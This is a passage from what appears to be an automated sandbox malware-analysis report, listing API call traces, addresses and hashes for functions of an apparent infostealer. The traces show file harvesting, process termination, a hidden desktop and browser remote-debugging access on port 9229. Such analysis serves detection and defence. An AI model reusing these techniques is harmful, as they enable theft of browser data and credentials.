                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8169E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C816AA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C816D5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C816F1
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81713
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8172D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81766
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8178E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81799
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C817A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817C1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C817CD
                                                      • lstrlen.KERNEL32(?), ref: 02C817DA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817FA
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81808
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81831
                                                      • StrCmpCA.SHLWAPI(?,00638C28), ref: 02C8185A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8189B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C818C4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C818EC
                                                      • StrCmpCA.SHLWAPI(?,006388A8), ref: 02C81909
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8194A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81973
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8199B
                                                      • StrCmpCA.SHLWAPI(?,00638E3C), ref: 02C819B9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C819EA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81A13
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81A3C
                                                      • StrCmpCA.SHLWAPI(?,00638938), ref: 02C81A6A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81AAB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81AD4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81AFC
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81B4D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81B75
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81BAC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C81BD3
                                                      • FindClose.KERNEL32(00000000), ref: 02C81BE2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 1346933759-0
                                                      • Opcode ID: 5de090228a520a034ca07d734478d829abf3d0d61972fb49c586d92848864290
                                                      • Instruction ID: 2dc1108cc7d0408340a0ecd9bb7a803d14096f8836841c82e30bcaafe01a11fc
                                                      • Opcode Fuzzy Hash: 5de090228a520a034ca07d734478d829abf3d0d61972fb49c586d92848864290
                                                      • Instruction Fuzzy Hash: 24128570A006069FDB14FF79DC89AAE7BF6EF44308F088528E849A7250DB74D945DFA1
                                                      Function 02C96807 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02C96860
                                                      • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02C96879
                                                      • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 02C96891
                                                      • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 02C968A9
                                                      • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 02C968C2
                                                      • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 02C968DA
                                                      • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02C968F2
                                                      • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 02C9690B
                                                      • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02C96923
                                                      • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 02C9693B
                                                      • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02C96954
                                                      • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 02C9696C
                                                      • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 02C96984
                                                      • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 02C9699D
                                                      • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 02C969B5
                                                      • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 02C969CD
                                                      • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02C969E6
                                                      • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 02C969FE
                                                      • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02C96A16
                                                      • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 02C96A2F
                                                      • LoadLibraryA.KERNEL32(00638D50,?,?,?,02C9203A), ref: 02C96A40
                                                      • LoadLibraryA.KERNEL32(0063897C,?,?,?,02C9203A), ref: 02C96A52
                                                      • LoadLibraryA.KERNEL32(00638904,?,?,?,02C9203A), ref: 02C96A64
                                                      • LoadLibraryA.KERNEL32(006389DC,?,?,?,02C9203A), ref: 02C96A75
                                                      • LoadLibraryA.KERNEL32(00638B28,?,?,?,02C9203A), ref: 02C96A87
                                                      • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 02C96AA4
                                                      • GetProcAddress.KERNEL32(00639020,00638C24), ref: 02C96AC0
                                                      • GetProcAddress.KERNEL32(00639020,006389CC), ref: 02C96AD8
                                                      • GetProcAddress.KERNEL32(00639114,00638B94), ref: 02C96AF4
                                                      • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02C96B10
                                                      • GetProcAddress.KERNEL32(00639004,00638C14), ref: 02C96B2C
                                                      • GetProcAddress.KERNEL32(00639004,004352A4), ref: 02C96B43
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      • Opcode ID: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction ID: 276a49cd547531bf9e3ba30e1e0d65b327c20e412c19dcea1da1c6d72e3c9406
                                                      • Opcode Fuzzy Hash: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction Fuzzy Hash: 00A16DB9A117009FD758DF69EE88A6637BBF789344300A51DF94683360DBB4A900DFB0
                                                      Function 00409770 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 233stringsleepprocessCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 00409790
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097A0
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097B1
                                                      • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004097C3
                                                      • memset.MSVCRT ref: 004097D7
                                                        • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00424075
                                                        • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,02D68720), ref: 0042409F
                                                        • Part of subcall function 00424040: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404DFA,?,00000014), ref: 004240A9
                                                      • wsprintfA.USER32 ref: 00409806
                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409827
                                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409844
                                                        • Part of subcall function 004248B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
                                                        • Part of subcall function 004248B0: Process32First.KERNEL32(00000000,00000128), ref: 004248D9
                                                        • Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
                                                        • Part of subcall function 004248B0: StrCmpCA.SHLWAPI(?,?), ref: 004248FD
                                                        • Part of subcall function 004248B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
                                                        • Part of subcall function 004248B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
                                                        • Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424928
                                                        • Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 00424936
                                                        • Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424941
                                                      • memset.MSVCRT ref: 00409862
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409878
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409889
                                                      • lstrcatA.KERNEL32(00000000,00434B68), ref: 0040989B
                                                      • memset.MSVCRT ref: 004098AF
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004098D4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409903
                                                      • StrStrA.SHLWAPI(00000000,02D8E010), ref: 00409919
                                                      • lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00409938
                                                      • lstrlenA.KERNEL32(?), ref: 0040994B
                                                      • wsprintfA.USER32 ref: 0040995B
                                                      • lstrcpy.KERNEL32(?,00000000), ref: 00409971
                                                      • memset.MSVCRT ref: 00409986
                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004099D8
                                                      • Sleep.KERNEL32(00001388), ref: 004099E7
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092E1
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092FA
                                                        • Part of subcall function 004092B0: memset.MSVCRT ref: 00409341
                                                        • Part of subcall function 004092B0: lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
                                                        • Part of subcall function 004092B0: lstrcatA.KERNEL32(?,00000000), ref: 00409372
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 00409399
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004093E6
                                                        • Part of subcall function 00424950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
                                                        • Part of subcall function 00424950: Process32First.KERNEL32(00000000,00000128), ref: 00424979
                                                        • Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
                                                        • Part of subcall function 00424950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
                                                        • Part of subcall function 00424950: TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
                                                        • Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249C2
                                                        • Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
                                                        • Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249DB
                                                      • CloseDesktop.USER32(?), ref: 00409A1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcatlstrcpy$Process32memset$CloseProcess$CreateHandleNextstrlen$DesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                                      • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                                      • API String ID: 67568813-1862457068
                                                      • Opcode ID: 0471f81c6efc9c7983f7f40d4f8ded86c8947c8730b0baf7d3319f74423e4b83
                                                      • Instruction ID: 38294f6e3b9bd2ecfb08d4d5c5f9e290344656206d8fb24d244d478861931029
                                                      • Opcode Fuzzy Hash: 0471f81c6efc9c7983f7f40d4f8ded86c8947c8730b0baf7d3319f74423e4b83
                                                      • Instruction Fuzzy Hash: 15916371A10218AFDB10DFA4DC89FDE77B9AF48700F504169F609A72D1DFB4AA448FA4
                                                      Function 02C81620 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81648
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8166B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81676
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C81681
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8169E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C816AA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C816D5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C816F1
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81713
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8172D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81766
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8178E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81799
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C817A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817C1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C817CD
                                                      • lstrlen.KERNEL32(?), ref: 02C817DA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817FA
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81808
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81831
                                                      • StrCmpCA.SHLWAPI(?,00638C28), ref: 02C8185A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8189B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C818C4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C818EC
                                                      • StrCmpCA.SHLWAPI(?,006388A8), ref: 02C81909
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8194A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81973
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8199B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81B4D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81B75
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81BAC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C81BD3
                                                      • FindClose.KERNEL32(00000000), ref: 02C81BE2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 1346933759-0
                                                      • Opcode ID: 0c6600d1548fdf9b6c169be3acf959fa0fb73bd41b803abdc6cd5abb21d52613
                                                      • Instruction ID: 2bc50a10db90ff70bec6b7dcecce82fbb897afafb494438348e9861117706394
                                                      • Opcode Fuzzy Hash: 0c6600d1548fdf9b6c169be3acf959fa0fb73bd41b803abdc6cd5abb21d52613
                                                      • Instruction Fuzzy Hash: D8C19670A006469BDB10FF74DD89AAE7BF6EF44308F088528EC49A7250EB74D945DFA1
                                                      Function 02C8D037 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C8D053
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C8D06A
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8D0B6
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C8D0C8
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8D0E2
                                                      • wsprintfA.USER32 ref: 02C8D107
                                                      • PathMatchSpecA.SHLWAPI(?,00638D64), ref: 02C8D139
                                                      • CoInitialize.OLE32(00000000), ref: 02C8D145
                                                        • Part of subcall function 02C8CF37: CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 02C8CF5D
                                                        • Part of subcall function 02C8CF37: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 02C8CF9D
                                                        • Part of subcall function 02C8CF37: lstrcpyn.KERNEL32(?,?,00000104), ref: 02C8D020
                                                      • CoUninitialize.COMBASE ref: 02C8D160
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8D185
                                                      • lstrlen.KERNEL32(?), ref: 02C8D192
                                                      • StrCmpCA.SHLWAPI(?,0042CFF4), ref: 02C8D1AC
                                                      • wsprintfA.USER32 ref: 02C8D1D4
                                                      • wsprintfA.USER32 ref: 02C8D1F3
                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 02C8D207
                                                      • wsprintfA.USER32 ref: 02C8D22F
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C8D248
                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02C8D267
                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02C8D27F
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C8D28A
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C8D296
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C8D2AB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8D2EB
                                                      • FindNextFileA.KERNEL32(?,?), ref: 02C8D3E4
                                                      • FindClose.KERNEL32(?), ref: 02C8D3F6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                                      • String ID:
                                                      • API String ID: 3860919712-0
                                                      • Opcode ID: 626ef74eb132f672f768666b2d2120955f45bb4ea48423338616a340fb27b7de
                                                      • Instruction ID: e991d520387ef08d72122a93baef1d155e5c6e6e2c2de7aa8d65d3ba40866c3b
                                                      • Opcode Fuzzy Hash: 626ef74eb132f672f768666b2d2120955f45bb4ea48423338616a340fb27b7de
                                                      • Instruction Fuzzy Hash: AAC151759002199FDB14EF64DC44FEE777AEF88304F048599F90AA7190EB74AA84CFA1
                                                      Function 02C8E657 Relevance: 30.2, APIs: 20, Instructions: 212stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C8E673
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C8E68A
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C8E6AA
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8E6C4
                                                      • wsprintfA.USER32 ref: 02C8E6E9
                                                      • StrCmpCA.SHLWAPI(?,0042CFF4), ref: 02C8E6FB
                                                      • wsprintfA.USER32 ref: 02C8E718
                                                        • Part of subcall function 02C8F227: lstrcpy.KERNEL32(00000000,?), ref: 02C8F259
                                                      • wsprintfA.USER32 ref: 02C8E737
                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 02C8E74B
                                                      • lstrcat.KERNEL32(?,00638D24), ref: 02C8E77C
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8E78E
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E79F
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8E7B1
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E7C5
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C8E7DB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E819
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E869
                                                      • DeleteFileA.KERNEL32(?), ref: 02C8E8A3
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C8E8E2
                                                      • FindClose.KERNEL32(00000000), ref: 02C8E8F1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                      • String ID:
                                                      • API String ID: 1375681507-0
                                                      • Opcode ID: 04a500ee45e0d5bd7b26600a9f1f28492467701008bf874d16c24c22c0a22dc1
                                                      • Instruction ID: efaf9c29a53cb8e2efaff24e093ddfee327bd535c68732cf480c777fc452ffdc
                                                      • Opcode Fuzzy Hash: 04a500ee45e0d5bd7b26600a9f1f28492467701008bf874d16c24c22c0a22dc1
                                                      • Instruction Fuzzy Hash: 6F816EB19002199FDB10EF64DC49EEE77BAFF88304F048599B90997150EB75AB48CFA1
                                                      Function 004248B0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004248D9
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 004248FD
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424928
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00424936
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424941
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: 956b9cb34166e2898696d065da2ac792d61c713baa536d295fc307e1a52bb286
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 44016D71601224ABE7215B70EC89FFB377DEB88B51F00119DF90596290EFB899848EB5
                                                      Function 02C94B17 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C94B30
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94B40
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94B52
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 02C94B64
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02C94B79
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02C94B88
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94B8F
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94B9D
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94BA8
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: 007e8e29a340b3770d821025a013c6f186548b2d112943fa1880aa65dfd77049
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 7401AD32601214ABEB245B60DC8CFFA377EEB88B51F00018CF90592180EFB49A818EB1
                                                      Function 02C84EF0 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84F18
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F3B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84F46
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C84F51
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F6E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C84F7A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84FA5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C84FC1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2567437900-0
                                                      • Opcode ID: a53eb7fe87ab6b69505aac4e885880b6fc62019f0cf0bde301dc556118b80bc4
                                                      • Instruction ID: 01db69f0a9e0046a2046bc92ea9db2ded21bd4eae32991fcfbffff87ae0d6d0d
                                                      • Opcode Fuzzy Hash: a53eb7fe87ab6b69505aac4e885880b6fc62019f0cf0bde301dc556118b80bc4
                                                      • Instruction Fuzzy Hash: 12317A71100A969BDB20FF29DC85E9E77A6EF90308F008128FC0497650EB75A945EF92
                                                      Function 02C94A87 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 02C94A9F
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94AAF
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94AC1
                                                      • StrCmpCA.SHLWAPI(?,00435084), ref: 02C94AD7
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94AE9
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94AF4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
